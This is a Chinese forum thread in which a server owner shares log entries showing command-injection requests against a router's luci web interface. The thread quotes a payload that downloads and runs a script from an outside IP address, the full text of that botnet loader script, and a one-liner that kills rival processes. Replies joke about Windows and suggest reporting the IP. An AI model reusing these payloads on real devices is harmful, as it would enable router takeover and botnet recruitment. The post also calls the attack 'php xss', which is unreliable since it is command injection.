Str
(𝑺𝒕𝒓 [𝐁𝐨𝐭] )
1
看见标题是不是以为注入成功了,诶!
被拦截了!要不然服务器可能真的没
首先今天看日志,诶,发现这样子的奇怪请求:
</s><i> </i> /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+wget.sh;+wget+http://87.121.112.42/wget.sh;+chmod+777+wget.sh;+./wget.sh+tplink;+rm+-rf+wget.sh`)<i> </i><e>
看起来是在尝试用php的xss注入,把 http://87.121.112.42/wget.sh 下载到本地并执行,我看了看这个sh
```
binarys="mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc"
server_ip="87.121.112.42"
binout="runmeplz"
exec="eshay"
for arch in $binarys
do
rm -rf $arch
rm -rf $binout
cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip
chmod 777 $binout
status=./$binout $1
if [ “$status” = “$exec” ]; then
break
fi
done
```
看了看,似乎是远控的,然后又发现一段
</s><i> </i>/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`for+proc_dir+in+/proc/[0-9]*;+do+pid=${proc_dir##*/};+buffer=$(cat+"/proc/$pid/maps");+if+[+"${#buffer}"+-gt+1+];+then+if+[+"${buffer#*"/lib/"}"+=+"$buffer"+]+&&+[+"${buffer#*"telnetdbot"}"+=+"$buffer"+];+then+kill+-9+"$pid";+fi;+fi;+done`)<i> </i><e>
>!不是哥们,我服务器Windows,成功注入了也没事!<
sakujo
(月宮 あゆ)
4
Windows服务器用过,我一个月的文章(7、8篇)不小心给删了,自此,我改用Linux系列。
懒得备份导致的后果。
fengzai
(丰仔)
5
虽然但是,感觉Windows会比Linux漏洞更多
sakujo
(月宮 あゆ)
6
sakujo
(月宮 あゆ)
8
@“丰仔”#p53728 Linux有些开源,有社区啊
fengzai
(丰仔)
9
@“削除禁止”#p53730 正确的,一针见血的:huaji08:
fengzai
(丰仔)
11
@“xXcmd1152Xx”#p53739 IP提供商是这家 https://neterra.net ,收集收集证据找他们举报吧:ac07:
滥用举报邮箱:[email protected]
sakujo
(月宮 あゆ)
12
@“xXcmd1152Xx”#p53739 sh好像能在windows运行的
sakujo
(月宮 あゆ)
13
@“xXcmd1152Xx”#p53739 别轻敌啊
Str
(𝑺𝒕𝒓 [𝐁𝐨𝐭] )
14
@“削除禁止”#p53743 好,服务器又好了,只不过是内存爆了
fengzai
(丰仔)
16
@“削除禁止”#p53742 目前这段木马一些语句Windows不支持,他搞不定的:ac06:
0x24a
(0x24a)
19
@“Googol”#p53755 这是别人攻击者的ip,你想搞攻击想的神志不清了吧
sakujo
(月宮 あゆ)
20
@“Googol”#p53755 那是攻击方IP xiao tsa kuei